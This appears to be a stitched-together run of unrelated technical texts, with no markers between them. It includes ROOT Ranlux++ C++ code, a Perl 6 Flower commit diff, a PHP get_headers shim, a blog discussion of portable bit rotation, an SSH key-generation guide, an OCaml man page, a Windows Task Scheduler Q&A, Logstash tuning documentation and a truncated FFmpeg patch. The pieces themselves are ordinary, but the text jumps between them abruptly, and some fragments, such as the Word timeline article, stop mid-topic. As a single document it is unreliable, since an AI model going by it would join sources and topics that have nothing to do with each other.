+    int av_foobar_to_string(char *buf, size_t buf_size, const AVFoobar *foobar);
+
+It uses buf[] to return the string. In the simplest cases, you call it with
+a buffer on the stack:
+
+    char buf[1024];
+    ret = av_foobar_to_string(buf, sizeof(buf));
+
+Now, with AVWriter. The function you need to call is:
+
+    void av_foobar_write(AVWriter wr, const AVFoobar *foobar);
+
+And you use the av_buf_writer_array() macro to encode buf as an AVWriter:
+
+    char buf[1024];
+    ret = av_foobar_write(av_buf_writer_array(buf), foobar);
+
+For all you know, av_buf_writer_array() could just be a fancy name for a
+macro that just expands to "buf, sizeof(buf)". And if you want to stop here
+and just use AVWriter the way you do in good old C, you can. But if you read
+on, you will see that it is much fancier than that, while being almost as
+simple to use.
+
+
+## Scenario 2: Concatenating the string into a message.
+
+Let us say you have two foobars to present to the user. Good old C:
+
+    char msg[2500], foo1_buf[1000], foo2_buf[1000];
+    av_foobar_to_string(foo1_buf, sizeof(foo1_buf), foo1);
+    av_foobar_to_string(foo2_buf, sizeof(foo2_buf), foo2);
+    snprintf(msg, sizeof(msg), "F%d = [ %s, %s ]", num, foo1_buf, foo2_buf);
+
+But it's ugly.
+Less ugly, but more complicated:
+
+    char msg[2500];
+    size_t pos = 0;
+    pos += snprintf (msg + pos, sizeof(msg) - pos, "F%d = [ ", num);
+    av_foobar_to_string(msg + pos, sizeof(msg) - pos, foo1);
+    pos += strlen(msg + pos);
+    pos += snprintf (msg + pos, sizeof(msg) - pos, ", ");
+    av_foobar_to_string(msg + pos, sizeof(msg) - pos, foo2);
+    pos += strlen(msg + pos);
+    pos += snprintf (msg + pos, sizeof(msg) - pos, "]");
+
+(Note: that's buggy, the snprintf() in the middle can overflow.)
+
+Well, that was the first thing AVWriter was meant to do: allow to build
+strings by concatenating them together. So, the AVWraper version of this
+code:
+
+    char msg[2500];
+    AVWriter wr = av_buf_writer_array(msg);
+    av_writer_printf(wr, "F%d = [ ", num);
+    av_foobar_write(wr, foo1);
+    av_writer_print(wr, ", ");
+    av_foobar_write(wr, foo2);
+    av_writer_print(wr, " ]");
+
+(I am confident I can teach av_writer_printf() to call av_foobar_write().)
+
+If I have my way, we will have "av_writer_fmt(AVWriter wr, const char *fmt,
+...);" where the arguments can be any type for which somebody have bothered
+to implement a _write() function. But that is for a bit later.
+
+And that's it. av_buf_writer_array() is just fancy macro work to keep track
+with a "size_t pos".
+
+But don't use it, it's rubbish. Use av_dynbuf_writer(), it's fancier.
+
+
+## Scenario 3: The strings are long and precious.
+
+Let us say that the string you are building can be arbitrarily long, and it
+is important to have it in its entirety. With good old C, you have to rely
+on some kind of realloc(). You know the kind of code, it is very boring, I
+will not write it here.
+
+That's exactly what av_buf_writer_array() is for. As a special optimization,
+it starts with a buffer on the stack, which means that for small strings, it
+will be as fast as the char[] version.
+
+XXX+ the commit says av_dynbuf_get_buffer in the doxy and other inconsistencies
+
+    AVWriter wr = av_dynbuf_writer();
+    /* same code as above */
+    char *msg = av_dynbuf_writer_get_data(wr, NULL);
+    use_the_message(msg);
+    av_dynbuf_writer_finalize(wr, NULL, NULL);
+
+WARNING: I have not covered error checking. Without error checking, this
+code will not cause an invalid memory access, and in particular will not be
+a security issue by itself, but it will cause the string to be truncated.
+That means silent data corruption, which is worse than a non-exploitable
+crash.
+
+
+## Scenario 4: So let's do error checks.
+
+The example code above will not crash. At all point,
+av_dynbuf_writer_get_data() will point to a valid 0-terminated buffer. If
+you know your data can be truncated later, then maybe you can tolerate to
+have it truncated here, especially since that kind of memory allocation
+failure is very very unlikely.
+
+But you are not lazy, and it's better to display "Out Of Cheese Error" than
+to store corrupted data without noticing.
+
+    ret = av_dynbuf_writer_get_error(wr, &size);
+    if (ret < 0) {
+        fprintf("Could not display foobar, would have been %zu long", size);
+        return ret;
+    }
+
+XXX that's good, but av_dynbuf_writer_get_data() should return a safe value
+
+
+## Scenario 5: We want to keep the string.
+
+Maybe what we will do with the message is something like:
+
+    av_dict_set(metadata, "foo_pair", msg);
+
+But if av_dynbuf_writer() did use dynamic allocation, we could use
+AV_DICT_DONT_STRDUP_VAL.
+
+That's what the pointers arguments to av_dynbuf_writer_finalize() are for.
+
+    ret = av_dynbuf_writer_finalize(wr, &msg, NULL);
+    if (ret < 0)
+        return ret;
+    av_dict_set(metadata, "foo_pair", msg, AV_DICT_DONT_STRDUP_VAL);
+
+
+XXX+ av_dynbuf_writer_finish error if truncated, av_dynbuf_writer_finish_anyway.
+XXX+ error check is all wrong
+
+
+## Scenario 6: You work with a library that already has string functions.
+## Scenario 7: You work with an API that does its own buffering.
+
+Let us say you are writing a Gtk+ application and you already use GString
+all over the place. (Note: GString is more or less like av_dynbuf_writer(),
+but with the Gtk+ taste instead of the FFmpeg taste; the API example should
+be obvious.) You could always:
+
+    av_foobar_write(wr, foo);
+    char *msg = av_dynbuf_writer_get_data(wr, NULL);
+    g_string_append(str, msg);
+
+But that's clumsy, you have to copy the string. If this comes frequently in
+the code, it would be better to have AVWriter collaborate with GString:
+
+    av_foobar_write(gstring_writer(str), foo);
+
+To be able to do that you need to implement a few callbacks and adapt some
+boilerplate code. It is not difficult, but too long for this introduction.
+
+There is no central repository, neither static nor dynamic. As soon as a
+part of a program has implemented the proper callbacks and set the proper
+pointers, it makes a valid AVWriter that can be used anywhere.
+
+Note that it applies to any kind of library or API: as the name says,
+AVWriter is made to write strings. Any API that looks like writing can be
+desguised as AVWriter.
+
+For example, there is another built-in AVWriter: av_log_writer(obj) it goes
+directly to av_log(obj, AV_LOG_INFO);
+
+
+## Scenario 8: This time, you are the one who returns a string.
+
+This time, you are the one who was about to write:
+
+    int av_bazqux_to_string(char *buf, size_t size, const Bazqux *baz);
+
+and you decide to write it:
+
+    void av_bazqux_write(AVWriter wr, const Bazqux *baz);
+
+There is nothing new to say, you already know how to add things to an
+AVWriter, it is in the second example:
+
+    av_writer_printf(wr, ...);
+
+Just use this, or any of the similar functions, to add whatever you want to
+the AVWriter you got as an argument. There is no error checking to do: it is
+not your responsibility.
+
+At this point, you could implement av_bazqux_to_string() as a trivial
+wrapper:
+
+    int av_bazqux_to_string(char *buf, size_t size, const Bazqux *baz) {
+        av_bazqux_write(av_buf_writer(buf, size), baz);
+        if (strlen(baz) == size - 1)
+            return AVERROR_BUFFER_TOO_SMALL;
+    }
+
+(Since av_buf_writer() does not keep track of error, we consider that
+reaching the end is already overflowing. We are wasting one char in a very
+rare situation.) But is it really useful?
+
+
+## Scenario 9: What with the types?
+
+If you are observant, you will wonder what happens if we write:
+
+    AVWriter wr = av_log_writer(buf);
+    char *msg = av_dynbuf_writer_get_data(wr, NULL);
+
+The short answer is: it will crash, badly. And that's ok: you knew you were
+doing something stupid. You got what you deserved. Same as if you had written:
+
+    char *msg = NULL;
+    snprintf(msg, strlen(msg), "Good Bye");
+
+The C language is based on the assumption that you know things about the
+code that cannot be expressed in the language itself, in particular with the
+type system. There is no type for non-NULL-pointer, yet there are places in
+the code you know for certain that a pointer is not NULL.
+
+AVWriter is designed with the same philosophy. When you write
+
+    AVWriter wr = av_dynbuf_writer();
+
+you know that wr is actually an AVDynbufWriter, and therefore you can call
+av_dynbuf_writer_get_data() on it.
+
+On the other hand, if you have an AVWriter of unknown origin, you cannot
+call a specific function. But you can call all the av_writer_whatever()
+functions.
+
+If you want to make a special case, to check for a specific kind of
+AVWriter, you can use:
+
+    if (av_dynbuf_writer_check(wr))
+
+In fact, all functions that accept only a specific kind of AVWriter in
+FFmpeg start with some kind of:
+
+    av_assert1(av_dynbuf_writer_check(wr));
+
+That means that if you are working with a libavutil built for development,
+if you make a mistake, you will get a clear error message.
But really, there +is no reason to make a mistake if you are not trying to tie your brain in a +knot.
I'm a newbie to Monero. My question is how Monero does the amount checking logic (the input amount should be larger than the output amount in a transaction) when a node receives a raw transaction.
I found there is some checking logic in wallet implementation wallet2::create_transactions_2.
THROW_WALLET_EXCEPTION_IF(needed_money + min_fee > balance_subtotal, error::not_enough_money, balance_subtotal, needed_money, 0);
THROW_WALLET_EXCEPTION_IF(needed_money + min_fee > unlocked_balance_subtotal, error::not_enough_unlocked_money, unlocked_balance_subtotal, needed_money, 0);
And tx_memory_pool::add_tx also has some checking logic when tx.version == 1
if (tx.version == 1)
{
  uint64_t inputs_amount = 0;
  if(!get_inputs_money_amount(tx, inputs_amount))
  {
    tvc.m_verifivation_failed = true;
    return false;
  }
  uint64_t outputs_amount = get_outs_money_amount(tx);
  if(outputs_amount > inputs_amount)
  {
    LOG_PRINT_L1("transaction use more money than it has: use " << print_money(outputs_amount) << ", have " << print_money(inputs_amount));
    tvc.m_verifivation_failed = true;
    tvc.m_overspend = true;
    return false;
  }
  else if(outputs_amount == inputs_amount)
  {
    LOG_PRINT_L1("transaction fee is zero: outputs_amount == inputs_amount, rejecting.");
    tvc.m_verifivation_failed = true;
    tvc.m_fee_too_low = true;
    return false;
  }
  fee = inputs_amount - outputs_amount;
}
else
{
  fee = tx.rct_signatures.txnFee;
}
But I don't think we use version 1 in transaction right now.
Could somebody give me a hint? Or is it impossible to do this kind of check in the raw transaction?
You already found the place for v1 transactions. For v2 (RingCT) transactions, since in/out amounts are masked, the check is done in src/ringct/rctSigs.cpp, in either verRctSemanticsSimple or verRct (depending on the signature type):
//check pseudoOuts vs Outs..
if (!equalKeys(sumPseudoOuts, sumOutpks)) {
  LOG_PRINT_L1("Sum check failed");
  return false;
}
This compares the sum of (masked) inputs to the sum of (masked) outputs plus the masked fee (the fee is not masked in the actual transaction, so the verification code masks it at that time). The dozen lines above perform these sums.
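The balance check above can be illustrated with a toy model. Real Monero commitments are points on the ed25519 curve; below, plain integers modulo a prime stand in for curve points, and the "generators" G and H are made-up numbers. This is only a sketch of the bookkeeping performed here, not the actual cryptography:

```python
# Toy Pedersen-style commitments: C = blinding*G + amount*H, with integers
# modulo a prime standing in for ed25519 curve points. G, H, and P are
# arbitrary toy values, not real parameters.

P = 2**61 - 1   # toy modulus
G, H = 2, 3     # toy "generators"

def commit(amount, blinding):
    """Commit to an amount without revealing it."""
    return (blinding * G + amount * H) % P

def sums_balance(pseudo_outs, out_commitments, fee):
    """The check: sum(pseudoOuts) == sum(outPk) + fee*H.
    The fee is not masked in the transaction, so it is 'masked' here."""
    lhs = sum(pseudo_outs) % P
    rhs = (sum(out_commitments) + fee * H) % P
    return lhs == rhs

# One input worth 10, split into outputs of 7 and 2 plus a fee of 1.
# The blinding factors must balance too: x_in = x_out1 + x_out2.
x1, x2 = 11, 5
ins  = [commit(10, x1 + x2)]
outs = [commit(7, x1), commit(2, x2)]

print(sums_balance(ins, outs, fee=1))  # True  - amounts and blindings balance
print(sums_balance(ins, outs, fee=2))  # False - would create money from thin air
```

Note that the check passes without the verifier ever learning the amounts 10, 7, and 2; it only ever sees the committed values.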
• This is incorrect. equalKeys is checking if the keys match, not the sum of masked amounts. The ultimate check of amounts is the range proof check per my answer. – jtgrassie Feb 22 '19 at 23:14
• Not quite. Range proofs aren't about checking outputs <= inputs, they're about checking they're in valid range. They also have nothing to do with inputs, so cannot be used for checking outputs <= inputs by deduction :) – user36303 Feb 23 '19 at 16:14
• The range proof is specifically used to prove the total value of inputs is greater than or equal to the total value of outputs (so it's positive) and within a range. This is so money cannot be created from thin air. – jtgrassie Feb 23 '19 at 18:10
• And it's this range proof the OP is asking about: "(the input amount should be larger than the output amount in a transaction)". – jtgrassie Feb 23 '19 at 18:14
Firstly, the current transaction version used is 2.
Second, you found the check in create_transactions_2 which ensures there is enough money to fund the transaction.
Lastly, the reason you are not seeing an explicit monetary value check in the mempool addition is because the amounts are Confidential Transactions (RingCT) - the amounts are masked. If you continue down in add_tx method, you'll find various other calls to blockchain.cpp to check the inputs and outputs of a tx. With RingCT, one of the checks needed is on the range proof: bulletproof_VERIFY. This ensures all inputs minus all outputs in the tx is within a range and positive. If you search back through the code from there, you'll find various places that call through to that check, such as core::handle_incoming_tx_accumulated_batch
• I thought the rangeproof just ensured that the outputs were within a certain range, and had nothing to do with the inputs? – WeCanBeFriends Apr 20 '19 at 13:10
• Inputs and outputs are used in the range proof. You need to know money is not being created out of thin air and you need to ensure the sum of all inputs minus the sum of all outputs is positive (or zero). See this answer. – jtgrassie Apr 20 '19 at 15:54
• If I understand: ProveRange(Sum(in)-Sum(out))? I was under the impression that there was a range proof for each output, so the output amount could not be negative. Is there a link or article on this? – WeCanBeFriends Apr 20 '19 at 16:43
• The proof proves that each committed value is positive and the sum of all inputs minus the sum of all outputs is greater-than or equal to 0. See Zero to Monero sections 4.2 & 4.3. – jtgrassie Apr 20 '19 at 17:47
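On the point debated in these comments: the sum check alone cannot catch a "negative" output, because masked amounts live modulo the group order, where -5 is simply a very large positive residue; it is the range proof that rules this out. A toy sketch (the group order here is only a rough stand-in for the real ed25519 order, and no actual cryptography is involved):

```python
# Why the range proof matters: modulo the group order, a "negative"
# amount wraps around to a huge positive residue, so the sum check
# alone still balances. L_ORDER is a rough stand-in for the real order.

L_ORDER = 2**252  # toy approximation of the ed25519 group order

def in_range(v, bits=64):
    """What a range proof certifies about each committed amount."""
    return 0 <= v < 2**bits

# An attacker tries to "spend" 5 by creating outputs worth 10 and -5:
inputs = [5]
outputs = [10, (-5) % L_ORDER]  # -5 wraps to an enormous residue

# The sums still balance modulo the group order...
assert sum(inputs) % L_ORDER == sum(outputs) % L_ORDER

# ...but the bogus output fails the range check, so the tx is rejected.
print(in_range(outputs[0]), in_range(outputs[1]))  # True False
```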
Each column in a worksheet contains the data for one variable. You can customize columns in various ways. You can name them, write descriptions of them, change fonts, resize them, hide unused columns, and more.
Insert a column
• To insert one column, click in the worksheet where you want to insert the column, then right-click and choose Insert Columns.
• To insert multiple columns, select one or more cells in the number of columns equal to the number that you want to insert, then right-click and choose Insert Columns.
Columns are inserted to the left of the selected columns.
Name a column
To enter or change a column name, click in the column name cell (below the column number cell) and type the name. A column name must follow these rules:
• It cannot be more than 31 characters.
• It cannot begin with an asterisk (*).
• It cannot contain the symbols ' or #.
• It cannot have the same name as a different column in the same worksheet.
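The naming rules above can be summarized as a small validator. This is just an illustration of the rules, not Minitab code (and it assumes the uniqueness check is case-sensitive, which the rules do not specify):

```python
# Sketch of the column-name rules listed above.

def valid_column_name(name, existing_names=()):
    if len(name) > 31:
        return False          # at most 31 characters
    if name.startswith("*"):
        return False          # may not begin with an asterisk
    if "'" in name or "#" in name:
        return False          # may not contain ' or #
    if name in existing_names:
        return False          # must be unique within the worksheet
    return True

print(valid_column_name("Yield"))             # True
print(valid_column_name("*temp"))             # False
print(valid_column_name("Yield", ["Yield"]))  # False
```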
Enter a column description
A column with a description has a red triangle in the upper right corner of the column name cell.
• To enter a column description, click in the column, then right-click and choose Column Properties > Description.
• To view the description of the column, hold the pointer over the red triangle in the corner of the column name cell.
Move columns
Complete the following steps to move columns to a different location in the worksheet.
1. Select one or more columns to move, then right-click and choose Move Columns.
2. Select one of the following:
• Before column C1: Put the selected columns before C1 (pushing other columns to the right).
• After last column in use: Put the selected columns after the last non-empty column.
• Before column: Put the selected columns before the column that you select.
3. Click OK.
Copy columns to columns
Complete the following steps to copy columns in the active worksheet to columns in a specified worksheet.
1. Choose Data > Copy > Columns to Columns.
2. In Copy from columns, enter the columns to copy.
3. From Store Copied Data in Columns, select a storage option:
• In new worksheet: Enter a name for the new worksheet (optional).
• In following worksheet, after last column used: Enter the name of an open worksheet to copy the columns to.
• In current worksheet, in columns: Enter one or more target columns.
4. To include column names, select Name the columns containing the copied data.
5. To specify the rows to include or exclude in the new columns, click Subset the Data and do the following:
1. Under Include or Exclude, specify whether to include or exclude rows from the copied columns.
2. From Specify Which Rows To Include/Specify Which Rows To Exclude, select one of the following:
• All rows/No rows: Include all rows or exclude no rows.
• Rows that match: Include or exclude rows that match a condition. Click Condition to enter the conditional expression.
• Brushed rows: Include or exclude rows that correspond to brushed points on a graph.
• Row numbers: Include or exclude the specified rows. Enter individual row numbers and ranges of row numbers. Use a colon (:) to denote an inclusive range. For example, enter 1 4 6:10 to signify the set 1, 4, 6, 7, 8, 9, 10.
6. Click OK in each dialog box.
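The row-specification syntax in step 5 ("1 4 6:10" for the set 1, 4, 6, 7, 8, 9, 10) can be sketched as a small parser. This is an illustration of the syntax only, not Minitab code:

```python
# Expand a row specification like "1 4 6:10" into explicit row numbers.
# A colon denotes an inclusive range.

def expand_rows(spec):
    rows = []
    for token in spec.split():
        if ":" in token:                      # inclusive range, e.g. 6:10
            lo, hi = map(int, token.split(":"))
            rows.extend(range(lo, hi + 1))
        else:                                 # single row number
            rows.append(int(token))
    return rows

print(expand_rows("1 4 6:10"))  # [1, 4, 6, 7, 8, 9, 10]
```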
Change column widths
There are several ways to change column widths.
Manually change the width of one or more columns
• To resize one column, hold the pointer over the right edge of the column number cell. Then, drag the two-sided arrow to the desired width.
• To resize multiple adjacent columns at the same time, select one or more cells in each of the columns, then hold the pointer on the right edge of any of the column number cells. Drag the two-sided arrow to the desired width. When you release the mouse button, the columns change size.
Set the width of all columns in the active worksheet
1. Click in the worksheet, then right-click and choose Column Properties > Standard Width.
2. In Standard column width, enter the number of characters to display (between 1 and 80).
3. To include columns whose widths were changed manually, select Change widths that were set individually.
4. Click OK.
Specify automatic widening or set a fixed width for selected columns
1. Drag to select the columns, then right-click and choose Column Properties > Width.
2. Select one of the following:
• Automatic widening: Minitab determines the column width by the width and format of the data in the column.
• Fixed width: Enter the exact width that you want the columns to be (up to 80 characters). To hide the columns, enter 0.
3. Click OK.
Change Minitab's default column width
Complete the following steps to change the standard column width for all new worksheets.
1. Choose File > Options > Worksheets > General.
2. In Column width, enter the number of characters to display (between 1 and 80).
3. Click OK.
Hide and unhide columns
There are several ways to hide or unhide columns in the active worksheet.
Hide selected columns
Do one of the following:
• Select one or more cells in the columns that you want to hide, then right-click and choose Column Properties > Hide Selected Columns.
• Hold the pointer over the right edge of the column number cell, then drag the two-sided arrow to the left until the column disappears.
Unhide selected columns
Select the two columns that surround the hidden columns, then right-click and choose Column Properties > Unhide Selected Columns.
Hide/unhide columns
You can manage the display of all columns in the worksheet.
Tip
To show or hide hidden columns in dialog boxes, click in the column, then right-click and choose Column Properties > Use Hidden Columns in Dialog Boxes.
1. Click in the column, then right-click and choose Column Properties > Hide/Unhide Columns.
2. From Columns to display in list boxes, select the columns that you want to hide or unhide:
• All Columns: Display all columns in the worksheet that contain data, including columns that were previously hidden, and any empty columns that are between the data columns.
• Data Columns: Display only columns that contain data.
• Empty Columns: Display only empty columns that are between columns that contain data.
3. Use the arrow buttons to move the columns between Unhidden Columns and Hidden Columns.
4. Click OK.
Sort columns
• To sort an entire worksheet by values in the selected column, such as a date column, click in the column, then right-click and choose Sort Columns > Entire Worksheet.
• To sort by more than one column or to sort only specified columns, click in the worksheet, then right-click and choose Sort Columns > Custom Sort.
How to know if a phone number is on Telegram?
If we want to check quickly, without adding contacts to our address book, whether a specific number uses Telegram, we can do it easily with a free, open-source application called TLChecker. We enter the phone number with its country prefix (for example, +34666555444) and click the "Check" button, and the program reports whether that number is registered on Telegram or not.
How to know if a number is registered on Telegram?
This is how you can do it: Open Telegram for the first time and enter the phone number with which you are going to register. Enter the verification code that Telegram sent you by SMS to confirm that the number belongs to you.
How to know a person's phone number on Telegram?
No. Neither party will see the other's phone number (unless you've allowed it in your privacy settings). It is a similar case to what happens when you send a message to a person you just met in a Telegram group.
How to search for a person on Telegram without a phone number?
Create a username so you don't give out your number. It will be enough to search for that username so that another person can find you in the application, so it will no longer be necessary to give them your phone number.
Why do unknown contacts appear on Telegram?
Contacts between Google and Telegram can be synchronized. A failure in the Telegram synchronization procedure causes contacts to appear in the app that have already been deleted.
How to know the IP of a Telegram message?
Telegram, when making calls, uses a protocol called Stun. This protocol makes it possible for NAT clients to find your public IP address. If we want to find out the other person's IP, it would be enough to launch Wireshark and call our victim.
How do you add a contact on Telegram?
You should know that you can add contacts on Telegram, even if they are not in your calendar. To do this, simply add any user using the instant messaging application and you will see that said contact appears in Telegram even if it is not registered on your mobile phone.
What is the difference between Telegram and WhatsApp?
In conclusion, Telegram is an instant messaging app that offers more functions than WhatsApp and more security mechanisms as long as they are activated correctly. However, WhatsApp is more used and as long as it remains that way, it will have an important competitive advantage over other platforms.
How do you send a private message on Telegram?
Step 1: Click on the pencil-shaped icon, located at the bottom right of the screen. Step 2: Find the person you want to send the message to and tap their name.
How to see all a person's messages on Telegram?
First you have to click on the name of the person you are talking to or the group you are in, and you will enter the file for that conversation. Inside, click on the Search option that will appear among the multiple options.
How to know who has viewed your Telegram profile?
It is not possible, only the creator/administrator of the channel could see who the subscribers are.
How do secret Telegram messages work?
The secret (or private) chat has big differences from a normal chat on Telegram. First of all, the key is that the messages from secret conversations can only be read by you and the recipient, while those from the rest of the conversations are stored in the cloud and Telegram can decrypt them.
Who can see me on Telegram?
When you are in the settings center, press the Privacy and security option. Privacy: Here you can choose your contacts who can see everything from your phone number to your profile photo. You will also be able to specify who will see your last time in the app and your online status.
How to know who visits your Telegram profile?
It is not possible, only the creator/administrator of the channel could see who the subscribers are.
Who can find you on Telegram?
With this, only the people you have in your contact list will be able to find you using your phone number. Below you can add exceptions. But the most normal thing is that you also have your contacts linked in the app.
How to get the phone number of an Instagram account?
It is impossible to know the person's number unless they decide to share it, since obtaining it otherwise would violate Instagram's privacy policies. They may share it through a private message (DM), or "CONTACT" may appear on their profile; if you tap that option you will be able to obtain their phone number.
How to track the location of a phone number?
To find out the location of a cell phone with its phone number, you can use a location service such as mSpy, Scannero or tracenumero.com. These applications allow you to track the exact location of a device in real time.
How to find someone with IP address?
IPLocation is a free online tool that will allow you to view the geographic location of any IP address. All you have to do is access the website, enter the IP address and the tool will show you the position on a map with the coordinates, country, region and city.
Where are Telegram contacts saved?
Contacts on Telegram work in a similar way to WhatsApp: they are synchronized with the contacts on your mobile phone, although they have the peculiarity that in this case the synchronized contacts are stored in the Telegram cloud.
How secure and private is Telegram?
Telegram secret chats use end-to-end encryption, respect user privacy, and operate independently.
What is special about Telegram?
They have send and read confirmation options; They feature support for calls, video calls and voice messages; They allow you to share images, videos and documents; 2-step verification as a security method.
What advantages does Telegram have?
It allows you to send files from your mobile to the PC and vice versa, it becomes an audio player, it helps you compress photos, create GIF images and even create your own minimalist blog. In addition, we will also include some settings dedicated to privacy and better managing your groups and conversations.
How to know if your partner has Telegram?
Another way to see who among your contacts is on Telegram is to use the side panel and tap Contacts. You will then see the list of your contacts who already have Telegram.
What kind of people use Telegram?
How can I see my phone number on Telegram?
This means we can't actually help you unless you have access to the phone number or Telegram on any of your devices. Go to Telegram Settings > Privacy and security and activate two-step verification. This way, the phone number alone will not be enough to log you in.
How to know if a phone number uses Telegram?
Without a doubt, TLChecker is a very simple and easy-to-use application that allows us, in seconds, to check whether a phone number uses Telegram or not directly from our computer, something that, with WhatsApp, for example, is not possible.
How to choose all contacts who do not use Telegram?
Once the above is done, the list of your contacts who do not yet use Telegram will automatically appear and there, you can choose as many as you want. After selecting each and every one of the contacts you want, just press the button that says “Invite to Telegram” and, at the same time, indicates the total number of people chosen.
How to use username on Telegram?
Q: What can I use as a username? You can use az, 0-9 and underscores. Usernames are not case-sensitive, but Telegram will store your preferences for this (for example, Telegram or TeleGram is the same user).
Posted on
UIView及繪圖練習範例APP
作業目標:Youtube操作影片
練習原始碼:homework0803
這個作業主要是在練習對view以及簡單的繪圖的操作,還有timer的使用
因此我截錄一些我覺得是練習關鍵的程式碼
下面的是viewController的相關程式碼
一個個出現的程式碼,按下show按鈕時觸發
- (IBAction)showButtonClick {
[self clearButtonClick];
[self.circleNumber resignFirstResponder];
total = [self.circleNumber.text integerValue];
index = 0;
//設定間隔一個個產生circle
[NSTimer scheduledTimerWithTimeInterval:1 target:self selector:@selector(addItems:) userInfo:NULL repeats:YES];
}
取得圓圈排列坐標的程式碼,傳入值為圓半徑及角度
//取得坐標
- (CGPoint)getPoint:(int) radius withAngel:(CGFloat) degrees{
int y = sin(degrees * M_PI / 180)*radius;
int x = cos(degrees * M_PI / 180)*radius;
CGPoint btCorner = CGPointMake(x, y) ;
return btCorner;
}
下面的程式碼則是在被新增的UIView物件裡面
顯示動畫,這邊要注意的是因為定位點的關係,由於我們希望元件的縮放是以view的中心來做縮放
所以改變的值是self.bounds,一般我們在做元件內部繪圖事件,都會使用self.bounds
而self.frame則是在外部設定物件資訊時使用。
-(void) playAnimation{
[UIView animateWithDuration:0.5f
animations:^{
self.bounds = CGRectMake(self.bounds.origin.x, self.bounds.origin.y, 50, 50);
}completion:^(BOOL finished) {
[UIView animateWithDuration:0.5f
animations:^{
self.bounds = CGRectMake(self.bounds.origin.x, self.bounds.origin.y, 30, 30);
}completion:^(BOOL finished) {
}];
}];
}
另外,因為- (id)initWithFrame:(CGRect)frame被呼叫的時間是在circle被新建的時後,而不是在被加到畫面時,
為了落實動畫的被執行時間,所以我又實作了layoutSubviews這個方法,
並加上BOOL init當今天是第一次被呼叫時,才會執行playAnimation
-(void)layoutSubviews{
if(init){
[self playAnimation];
init = NO;
}
}
然後實作按下後縮小離開時恢復大小的功能
-(void) touchesBegan:(NSSet *)touches withEvent:(UIEvent *)event{
[UIView animateWithDuration:0.2f
animations:^{
self.bounds = CGRectMake(self.bounds.origin.x, self.bounds.origin.y, 0, 0);
}
completion:^(BOOL finished) {
}];
}
-(void) touchesEnded:(NSSet *)touches withEvent:(UIEvent *)event{
[UIView animateWithDuration:0.2f
animations:^{
self.bounds = CGRectMake(self.bounds.origin.x, self.bounds.origin.y, 30, 30);
}
completion:^(BOOL finished) {
}];
}
原始碼下載:homework0803
|
__label__pos
| 0.991154 |
What is the function of a sound card?
The evolution of technology has paved the way for remarkable advancements in the world of audio. From the simple beeps and boops of early computers to the immersive surround sound experience we enjoy today, sound has become an indispensable part of our lives. At the heart of this audio revolution lies a crucial piece of hardware known as the sound card. So, what is the function of a sound card? Let’s delve into this fascinating subject and explore the various roles it plays in enhancing our auditory experience.
**What is the function of a sound card?**
The primary function of a sound card is to process and convert digital or analog audio into a format that can be played through speakers or headphones. It acts as an intermediary between your computer’s software and its audio hardware, enabling your system to produce sound in a wide range of formats and qualities. In simpler terms, a sound card turns computer data into audible sound.
What are the different types of sound cards?
1. Integrated Sound Cards: These are built-in sound cards that come pre-installed on motherboards. They are typically capable of basic audio functions and cater to average users.
2. Dedicated Sound Cards: Designed for audiophiles and professionals, dedicated sound cards offer superior audio quality and advanced features for tasks like music production and gaming.
What are the components of a sound card?
3. Digital-to-Analog Converter (DAC): This component converts digital audio signals into analog signals that can be played through speakers or headphones.
4. Analog-to-Digital Converter (ADC): As the name suggests, the ADC converts analog audio signals into digital signals, allowing them to be processed by the computer.
5. Audio Processor: Responsible for tasks such as audio mixing, effects processing, and audio enhancement, the audio processor plays a vital role in enhancing sound quality.
Can a sound card improve audio quality?
6. Yes, a dedicated sound card can vastly improve audio quality by reducing interference and noise, providing higher sampling rates, and offering enhanced audio processing capabilities.
7. However, it’s important to note that the improvement in audio quality may not be noticeable on lower-end speakers or headphones, so the overall setup should be taken into consideration.
What other features do sound cards offer?
8. Multiple Channel Support: Sound cards can support various audio channels, including stereo, 5.1 surround sound, and even 7.1 surround sound setups, delivering a more immersive audio experience.
9. Microphone Input: Sound cards often include microphone inputs, enabling users to connect external microphones for voice recording or communication purposes.
10. MIDI Support: Many sound cards offer MIDI (Musical Instrument Digital Interface) support, allowing users to connect MIDI instruments such as keyboards and controllers directly to their computer.
Can a sound card offload CPU usage?
11. Yes, a dedicated sound card can offload audio processing tasks from the CPU, leading to better overall system performance, especially during intensive audio tasks like gaming or music production.
12. By shifting the audio workload to a specialized hardware component, the CPU is freed up to handle other tasks, resulting in smoother performance and better frame rates.
Are sound cards necessary for all computers?
13. Integrated sound cards are generally sufficient for everyday computer usage, such as web browsing, multimedia playback, and casual gaming.
14. However, if you require high-quality audio output, advanced audio processing, or if you are an audio professional or enthusiastic gamer, investing in a dedicated sound card can greatly enhance your experience.
Do laptops have sound cards?
15. Yes, laptops have integrated sound cards built into their motherboards. While they may not match the audio quality and performance of dedicated sound cards, they are perfectly suitable for most laptop users.
Can I upgrade my sound card?
16. Upgrading sound cards is possible in desktop computers. You can purchase a dedicated sound card and install it into an available PCIe slot on your motherboard. However, laptop users generally do not have the option for sound card upgrades.
Why do some sound cards have multiple ports?
17. Sound cards with multiple ports allow for greater versatility in connecting various audio devices simultaneously. This is particularly useful for users who require multiple audio inputs and outputs, such as musicians or audio engineers.
Do sound cards support surround sound?
18. Yes, sound cards are instrumental in delivering surround sound experiences. They process audio data from multiple channels and distribute them to the corresponding speakers in a surround sound setup, creating an immersive soundstage.
Is the quality of my sound card limited by my speakers?
19. While sound cards play a crucial role in audio quality, they are not solely responsible for the overall audio experience. The quality of speakers or headphones used in conjunction with a sound card also greatly influences the final sound output.
In conclusion, the function of a sound card is to bridge the gap between digital audio data and audible sound. Whether you’re a music enthusiast, gamer, or professional, a reliable sound card can greatly enhance your audio experience by offering improved audio quality, advanced audio processing features, and support for various audio setups. So, the next time you dive into your favorite playlist or engage in an intense gaming session, take a moment to appreciate the vital role of the humble sound card in making it all possible.
Leave a Comment
Your email address will not be published. Required fields are marked *
Scroll to Top
|
__label__pos
| 1 |
How to use Mattermost to create Microsoft Sharepoint sites and others
Some of my prospects have a fairly large SharePoint implementation and usage, which is why some of them ask whether it's possible to trigger a task in SharePoint or other tools from Mattermost. Because Mattermost supports so-called WebSocket connections, it's fairly easy to integrate Mattermost events with other tools. In one case the question was: "How can I create a SharePoint site every time a channel in Mattermost is created?"
Let me give you a bit of background first… The Mattermost WebSocket API allows you to capture events over a secure (if enabled) WebSocket connection and already has different drivers available: https://api.mattermost.com/
